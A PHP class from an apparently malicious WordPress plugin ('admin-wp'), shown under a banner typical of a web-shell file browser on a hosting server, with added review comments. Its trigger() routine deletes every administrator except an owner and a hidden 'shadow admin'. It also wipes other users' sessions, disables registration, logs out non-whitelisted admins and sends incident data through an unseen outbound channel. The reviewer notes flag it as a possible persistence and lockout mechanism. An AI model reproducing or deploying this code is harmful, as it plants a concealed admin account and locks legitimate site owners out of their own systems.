|
Server IP : 10.106.20.4 / Your IP : 216.73.216.140 Web Server : Apache System : Linux webm004.cluster106.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : sylvaineey ( 605664) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/sylvaineey/www/wp-content/plugins/admin-wp/includes/ |
<?php
// Direct-access guard: stop immediately unless WordPress loaded this file (ABSPATH is defined).
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}
/**
 * Site-wide "lockdown" state and enforcement for the plugin using the 'admin-wp' text domain.
 *
 * While the `_awg_lockdown` option is truthy, init() hooks enforce() on `init`,
 * forces `users_can_register` to read as zero, and filters REST authentication
 * through restrict_rest().
 *
 * NOTE(review): trigger() deletes every administrator account except the two IDs
 * returned by AWG_Admin_Guardian::get_owner_id() and AWG_Shadow_Admin::get_id().
 * Neither class is visible in this file, so which accounts are exempted cannot be
 * confirmed from here. During triage, treat both exempted accounts as unverified:
 * removing all other administrators while preserving a "shadow" account is
 * consistent with a lockout/persistence mechanism as well as with a protective one.
 * Confirm against the rest of the plugin and the site's user table.
 */
class AWG_Lockdown {
// Name of the wp_options row that stores the lockdown flag; its presence with a
// truthy value is what switches the hooks in init() on.
const OPT_ACTIVE = '_awg_lockdown';
/**
 * Registers the lockdown hooks, but only when the flag option is currently set.
 *
 * Hooks added: enforce() on `init` at priority 0, `__return_zero` on
 * `option_users_can_register`, and restrict_rest() on
 * `rest_authentication_errors` at priority 999.
 */
public static function init(): void {
if ( self::is_active() ) {
add_action( 'init', [ __CLASS__, 'enforce' ], 0 );
// Overrides the value read for users_can_register regardless of what is stored.
add_filter( 'option_users_can_register', '__return_zero' );
add_filter( 'rest_authentication_errors', [ __CLASS__, 'restrict_rest' ], 999 );
}
}
/* ---- state ---- */
/**
 * Reports whether lockdown is on.
 *
 * @return bool The stored option cast to bool; false when the option is absent.
 */
public static function is_active(): bool {
return (bool) get_option( self::OPT_ACTIVE, false );
}
/**
 * Turns lockdown on by writing 1 to the flag option.
 *
 * The third argument to update_option() is the autoload setting (false here).
 */
public static function activate(): void {
update_option( self::OPT_ACTIVE, 1, false );
}
/**
 * Turns lockdown off by deleting the flag option.
 *
 * Only the flag is removed: the `users_can_register` value written by
 * block_registration() is not restored, and accounts deleted by
 * purge_unauthorized_admins() are not recreated.
 */
public static function deactivate(): void {
delete_option( self::OPT_ACTIVE );
}
/* ---- trigger (called when breach detected) ---- */
/**
 * Runs the full lockdown sequence: set the flag, delete non-exempt administrators,
 * destroy sessions of non-exempt users, disable registration, then log and report.
 *
 * No capability check or nonce is performed here; any code path that can call
 * this method causes account deletion. Callers are not visible in this file.
 *
 * @param string $reason  Passed unchanged to the incident log and to send_lockdown().
 * @param array  $details Passed unchanged to the incident log and to send_lockdown().
 */
public static function trigger( string $reason, array $details = [] ): void {
self::activate();
self::purge_unauthorized_admins();
self::destroy_unauthorized_sessions();
self::block_registration();
AWG_Admin_Guardian::log_incident( 'lockdown_triggered', [
'reason' => $reason,
'details' => $details,
] );
// NOTE(review): AWG_Secure_Comm is not shown; presumably this transmits the
// reason/details somewhere — review that class for outbound destinations.
AWG_Secure_Comm::send_lockdown( $reason, $details );
}
/* ---- purge all admins except owner + shadow ---- */
/**
 * Deletes every user with the `administrator` role except the owner and shadow IDs,
 * destroying each deleted user's session tokens first.
 *
 * This is destructive and irreversible from within this class.
 */
private static function purge_unauthorized_admins(): void {
// NOTE(review): bypass(true)/bypass(false) bracket the query; presumably this
// lifts a filter that otherwise alters get_users() results for the shadow
// account — AWG_Shadow_Admin is not shown, confirm there.
AWG_Shadow_Admin::bypass( true );
$admins = get_users( [ 'role' => 'administrator' ] );
AWG_Shadow_Admin::bypass( false );
$owner_id = AWG_Admin_Guardian::get_owner_id();
$shadow_id = AWG_Shadow_Admin::get_id();
// wp_delete_user() lives in an admin include that is not loaded on front-end requests.
require_once ABSPATH . 'wp-admin/includes/user.php';
foreach ( $admins as $admin ) {
// Strict comparison: assumes both getters return int — TODO confirm. If either
// returns a string, the exemption never matches and that account is deleted too.
if ( $admin->ID === $owner_id || $admin->ID === $shadow_id ) {
continue;
}
WP_Session_Tokens::get_instance( $admin->ID )->destroy_all();
// Content is reassigned to the owner when an owner ID exists; with null,
// wp_delete_user() deletes the removed user's posts instead of reassigning them.
wp_delete_user( $admin->ID, $owner_id > 0 ? $owner_id : null );
}
}
/* ---- destroy sessions of non-whitelisted users ---- */
/**
 * Destroys all session tokens for every user of any role except the owner and
 * shadow IDs, which forces those users to log in again.
 */
private static function destroy_unauthorized_sessions(): void {
AWG_Shadow_Admin::bypass( true );
$all_users = get_users( [ 'fields' => 'ID' ] );
AWG_Shadow_Admin::bypass( false );
$owner_id = AWG_Admin_Guardian::get_owner_id();
$shadow_id = AWG_Shadow_Admin::get_id();
foreach ( $all_users as $uid ) {
// IDs are cast to int so the strict comparison below can match;
// still assumes the two getters return int — TODO confirm.
$uid = (int) $uid;
if ( $uid === $owner_id || $uid === $shadow_id ) {
continue;
}
WP_Session_Tokens::get_instance( $uid )->destroy_all();
}
}
/* ---- disable registration ---- */
/**
 * Persistently writes 0 to the `users_can_register` option.
 *
 * This stored value survives deactivate()/destroy(); it must be reset by hand if
 * registration was enabled before lockdown.
 */
private static function block_registration(): void {
update_option( 'users_can_register', 0 );
}
/* ---- enforce lockdown on every request ---- */
/**
 * `init` callback: logs out any logged-in administrator who is not whitelisted
 * and redirects them to the login URL.
 *
 * Anonymous visitors, whitelisted users and logged-in non-administrators pass
 * through untouched. What "whitelisted" means is decided by
 * AWG_Admin_Guardian::is_whitelisted(), which is not shown here.
 */
public static function enforce(): void {
if ( ! is_user_logged_in() ) return;
$uid = get_current_user_id();
if ( AWG_Admin_Guardian::is_whitelisted( $uid ) ) return;
$user = wp_get_current_user();
if ( $user && in_array( 'administrator', (array) $user->roles, true ) ) {
wp_logout();
wp_safe_redirect( wp_login_url() );
// Stop here so nothing else runs for the logged-out request.
exit;
}
}
/* ---- REST API restriction in lockdown ---- */
/**
 * `rest_authentication_errors` callback: blocks REST requests during lockdown.
 *
 * An error set by an earlier callback is returned unchanged. Otherwise
 * unauthenticated requests get a 503 `awg_lockdown` error, authenticated but
 * non-whitelisted users get a 403 `awg_lockdown` error, and whitelisted users
 * receive the incoming value back.
 *
 * @param mixed $errors Value passed along the filter chain by WordPress.
 * @return mixed The incoming value, or a WP_Error that denies the request.
 */
public static function restrict_rest( $errors ) {
if ( is_wp_error( $errors ) ) return $errors;
if ( ! is_user_logged_in() ) {
return new WP_Error(
'awg_lockdown',
__( 'Site is in lockdown mode.', 'admin-wp' ),
[ 'status' => 503 ]
);
}
$uid = get_current_user_id();
if ( ! AWG_Admin_Guardian::is_whitelisted( $uid ) ) {
return new WP_Error(
'awg_lockdown',
__( 'Access denied during lockdown.', 'admin-wp' ),
[ 'status' => 403 ]
);
}
return $errors;
}
/* ---- cleanup ---- */
/**
 * Removes the lockdown flag option; the body is the same as deactivate().
 */
public static function destroy(): void {
delete_option( self::OPT_ACTIVE );
}
}
